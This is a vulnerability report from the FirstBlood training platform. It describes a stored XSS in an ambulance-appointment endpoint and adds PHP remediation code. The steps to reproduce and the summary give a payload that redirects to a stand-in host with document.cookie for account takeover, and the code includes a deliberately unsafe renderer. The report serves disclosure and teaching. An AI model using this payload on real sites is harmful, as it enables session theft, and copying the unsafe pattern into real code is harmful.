FirstBlood-#1298 Enable Ambulance Service for the Appointment leading to Stored XSS
This issue was discovered on FirstBlood v3

On 2022-12-09, mr_xhunt Level 8 reported:

Summary:

I have found that while creating the appointment, adding the ambulance parameter with value 1 enables the Ambulance service for us, and adding the XSS payload in the fname gets us Stored XSS on /api/ambulances.php.

Steps to Reproduce:

  1. You need to create an appointment and intercept the request in Burp Suite.
  2. Add a new parameter ambulance with value 1.
  3. Now add the payload in the fname parameter: hello"><script>document.location=`http://LOCALHOST/${document.cookie}`</script/x>
  4. Now go to the following endpoint and enter the appointment guid: https://7cac14721157-mrxhunt.a.firstbloodhackers.com/api/ambulances.php?select=18ce7d19-b364-479b-97d3-7522453a2d83
  5. On visiting the page you will get an alert box popup.
  6. Using the payload given will leak the cookie and can be used for ATO.

Remediation:

The fname parameter values must be sanitized before writing them into the source.

P2 High

Endpoint: /api/ba.php & /api/ambulances.php

Parameter: ambulance & fname

Payload: 1 & hello"><script>document.location=`http://LOCALHOST/${document.cookie}`</script/x>
FirstBlood ID: 53
Vulnerability Type: Stored XSS

It is possible to achieve stored XSS on /api/ambulances.php?select={id} via the user's first/last name. For this to work the parameter ambulance=1 must be set.
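As an added illustration of the remediation (not code from the report or from the FirstBlood application), a hypothetical PHP renderer for the ambulance page showing the vulnerable write beside its output-encoded form; the record layout, field names and function names are assumptions, and the sample record is constructed from the payload quoted in the report.

```php
<?php
// Added example, not FirstBlood code. Demonstrates why the stored name
// becomes live markup and how context-aware output encoding stops it.

// Vulnerable pattern: the stored name is concatenated into HTML as-is,
// so a name containing "><script>... closes the tag and runs a script.
function render_ambulance_unsafe(array $appt): string {
    return '<td data-guid="' . $appt['guid'] . '">'
         . $appt['fname'] . ' ' . $appt['lname'] . '</td>';
}

// Hardened pattern: every untrusted value is encoded for the HTML
// context it lands in. ENT_QUOTES escapes both " and ' so a value
// cannot break out of an attribute; ENT_SUBSTITUTE keeps invalid UTF-8
// from silently turning the whole field into an empty string.
function h(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_ambulance_safe(array $appt): string {
    return '<td data-guid="' . h($appt['guid']) . '">'
         . h($appt['fname']) . ' ' . h($appt['lname']) . '</td>';
}

// The ambulance flag is a boolean, not free-form input: normalise it to
// 0/1 on the way in so only the two expected values ever reach storage.
function normalize_ambulance_flag($raw): int {
    return filter_var($raw, FILTER_VALIDATE_BOOLEAN, FILTER_NULL_ON_FAILURE) === true ? 1 : 0;
}

// Constructed sample record (hypothetical), using the payload from the report.
$appt = [
    'guid'      => '18ce7d19-b364-479b-97d3-7522453a2d83',
    'fname'     => 'hello"><script>document.location=`http://LOCALHOST/${document.cookie}`</script/x>',
    'lname'     => 'Smith',
    'ambulance' => normalize_ambulance_flag('1'),
];

echo render_ambulance_unsafe($appt), PHP_EOL; // script element reaches the page
echo render_ambulance_safe($appt), PHP_EOL;   // angle brackets and quotes are entity-encoded

// Sanity check: the encoded rendering contains no live <script> tag.
assert(strpos(render_ambulance_safe($appt), '<script') === false);
assert($appt['ambulance'] === 1);
```

The same encoding must be applied wherever fname or lname is written into a page, including the appointment views that do not involve the ambulance flag.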